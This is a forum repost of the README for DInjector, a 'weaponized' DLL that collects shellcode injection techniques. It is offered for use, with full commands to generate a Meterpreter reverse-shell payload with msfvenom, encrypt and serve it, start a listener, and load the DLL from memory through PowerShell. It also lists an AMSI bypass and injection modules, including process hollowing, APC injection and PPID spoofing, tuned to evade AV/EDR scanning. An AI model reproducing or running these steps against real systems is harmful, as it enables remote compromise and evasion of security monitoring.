Home Latest Feeds Freebies DInjector | Collection Of Shellcode Injection Techniques Packed In A D/Invoke Weaponized DLL – Tools & Scripts – OneHack.Us | Tutorials For Free, Guides, Articles & Community Forum – Tutorials Free. A place where everyone can share knowledge with each other.

DInjector | Collection Of Shellcode Injection Techniques Packed In A D/Invoke Weaponized DLL – Tools & Scripts – OneHack.Us | Tutorials For Free, Guides, Articles & Community Forum – Tutorials Free. A place where everyone can share knowledge with each other.

DInjector | Collection Of Shellcode Injection Techniques Packed In A D/Invoke Weaponized DLL – Tools & Scripts – OneHack.Us | Tutorials For Free, Guides, Articles & Community Forum – Tutorials Free. A place where everyone can share knowledge with each other.


This repository is an accumulation of my code snippets for various shellcode injection techniques using fantastic D/Invoke API by @TheWover and @FuzzySecurity.


:information_source: Based on my testings the DInvoke NuGet package itself is being flagged by many commercial AV/EDR solutions when incuded as an embedded resource via Costura.Fody (or similar approaches), so I’ve shrinked it a bit and included from source to achieve better OpSec.


  1. Compile the project in VS.
  2. Generate a shellcode for your favourite C2:

~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST= LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin

  1. Encrypt the shellcode:

~$ encrypt.py shellcode.bin -p ‘Passw0rd!’ -o enc

  1. Serve the encrypted shellcode and prepare C2 listener:

~$ sudo python3 -m http.server 80 ~$ sudo msfconsole -qx “use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost; set lport 443; set EXITFUNC thread; run”

  1. Use the PowerShell download cradle to load DInjector.dll as System.Reflection.Assembly and execute it from memory.

:warning: I do not recommend putting the assembly on disk because it will very likely be flagged.

Required global arguments:

Name Example Value Description
/am51 True, False Applies AMSI bypass
/sc Sets shellcode path (can be loaded from URL or as a Base64 string)
/password Passw0rd! Sets password to decrypt the shellcode


:warning: OpSec safe considerations are based on my personal usage expirience and some testings along the way.


module_name: ‘functionpointer’ description: | Allocates a RW memory region, copies the shellcode into it and executes it like a function. calls: – ntdll.dll: 1: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’ 2: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’ opsec_safe: false references: – ‘http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/’ – ‘https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis’ – ‘https://www.fergonez.net/post/shellcode-csharp


module_name: ‘functionpointerv2’ description: | Sets RX on a byte array and executes it like a function. calls: – ntdll.dll: 1: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’ opsec_safe: false references: – ‘https://jhalon.github.io/utilizing-syscalls-in-csharp-1/’ – ‘https://jhalon.github.io/utilizing-syscalls-in-csharp-2/’ – ‘https://github.com/jhalon/SharpCall/blob/master/Syscalls.cs


module_name: ‘clipboardpointer’ description: | Copies shellcode bytes into the clipboard, sets RX on it and executes it like a function. calls: – user32.dll: 1: ‘OpenClipboard’ 2: ‘SetClipboardData’ 3: ‘CloseClipboard’ – ntdll.dll: 1: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’ opsec_safe: true references: – ‘https://gist.github.com/Wra7h/69a03c802ae6977e74b1152a4b004515


module_name: ‘currentthread’ description: | Injects shellcode into current process. Thread execution via NtCreateThreadEx. calls: – ntdll.dll: 1: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’ 2: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’ 3: ‘NtCreateThreadEx’ 4: ‘NtWaitForSingleObject’ opsec_safe: false references: – ‘https://github.com/XingYun-Cloud/D-Invoke-syscall/blob/main/Program.cs


module_name: ‘remotethread’ arguments: | /pid:1337 description: | Injects shellcode into an existing remote process. Thread execution via NtCreateThreadEx. calls: – ntdll.dll: 1: ‘NtOpenProcess’ 2: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’ 3: ‘NtWriteVirtualMemory’ 4: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’ 5: ‘NtCreateThreadEx’ opsec_safe: false references: – ‘https://github.com/S3cur3Th1sSh1t/SharpImpersonation/blob/main/SharpImpersonation/Shellcode.cs


module_name: ‘remotethreadview’ arguments: | /pid:1337 description: | Injects shellcode into an existing remote process. Thread execution via RtlCreateUserThread. calls: – ntdll.dll: 1: ‘NtOpenProcess’ 2: ‘NtCreateSection (PAGE_EXECUTE_READWRITE)’ 3: ‘NtMapViewOfSection (PAGE_READWRITE)’ 4: ‘NtMapViewOfSection (PAGE_EXECUTE_READ)’ 5: ‘RtlCreateUserThread’ 6: ‘NtUnmapViewOfSection’ 7: ‘NtClose’ opsec_safe: false references: – ‘https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Sections%20Shellcode%20Process%20Injector/Program.cs


module_name: ‘remotethreadsuspended’ arguments: | /pid:1337 description: | Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS. After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ. Thread execution via NtCreateThreadEx. calls: – ntdll.dll: 1: ‘NtOpenProcess’ 2: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’ 3: ‘NtWriteVirtualMemory’ 4: ‘NtProtectVirtualMemory (PAGE_NOACCESS)’ 5: ‘NtCreateThreadEx (CREATE_SUSPENDED)’ 6: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’ 7: ‘NtResumeThread’ opsec_safe: true references: – ‘https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/’ – ‘https://github.com/plackyhacker/Suspended-Thread-Injection/blob/main/injection.cs


module_name: ‘remotethreadapc’ arguments: | /image:C:WindowsSystem32svchost.exe /ppid:31337 /blockDlls:True description: | Injects shellcode into a newly spawned remote process. Thread execution via NtQueueApcThread. calls: – kernel32.dll: 1: ‘InitializeProcThreadAttributeList’ 2: ‘UpdateProcThreadAttribute (blockDLLs)’ 3: ‘UpdateProcThreadAttribute (PPID)’ 4: ‘CreateProcessA’ – ntdll.dll: 1: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’ 2: ‘NtWriteVirtualMemory’ 3: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’ 4: ‘NtOpenThread’ 5: ‘NtQueueApcThread’ 6: ‘NtAlertResumeThread’ opsec_safe: true references: – ‘https://rastamouse.me/exploring-process-injection-opsec-part-2/’ – ‘https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0


module_name: ‘remotethreadcontext’ arguments: | /image:C:WindowsSystem32svchost.exe /ppid:31337 /blockDlls:True description: | Injects shellcode into a newly spawned remote process. Thread execution via SetThreadContext. calls: – kernel32.dll: 1: ‘InitializeProcThreadAttributeList’ 2: ‘UpdateProcThreadAttribute (blockDLLs)’ 3: ‘UpdateProcThreadAttribute (PPID)’ 4: ‘CreateProcessA’ – ntdll.dll: 1: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’ 2: ‘NtWriteVirtualMemory’ 3: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’ 4: ‘NtCreateThreadEx (CREATE_SUSPENDED)’ 5: ‘GetThreadContext’ 6: ‘SetThreadContext’ 7: ‘NtResumeThread’ opsec_safe: true references: – ‘https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/’ – ‘https://github.com/djhohnstein/CSharpSetThreadContext/blob/master/Runner/Program.cs


module_name: ‘processhollow’ arguments: | /image:C:WindowsSystem32svchost.exe /ppid:31337 /blockDlls:True description: | Injects shellcode into a newly spawned remote process. Thread execution via NtResumeThread (hollowing with shellcode). calls: – kernel32.dll: 1: ‘InitializeProcThreadAttributeList’ 2: ‘UpdateProcThreadAttribute (blockDLLs)’ 3: ‘UpdateProcThreadAttribute (PPID)’ 4: ‘CreateProcessA’ – ntdll.dll: 1: ‘NtQueryInformationProcess’ 2: ‘NtReadVirtualMemory’ 3: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READWRITE)’ 4: ‘NtWriteVirtualMemory’ 5: ‘NtProtectVirtualMemory (oldProtect)’ 6: ‘NtResumeThread’ opsec_safe: false references: – ‘https://github.com/CCob/SharpBlock/blob/master/Program.cs




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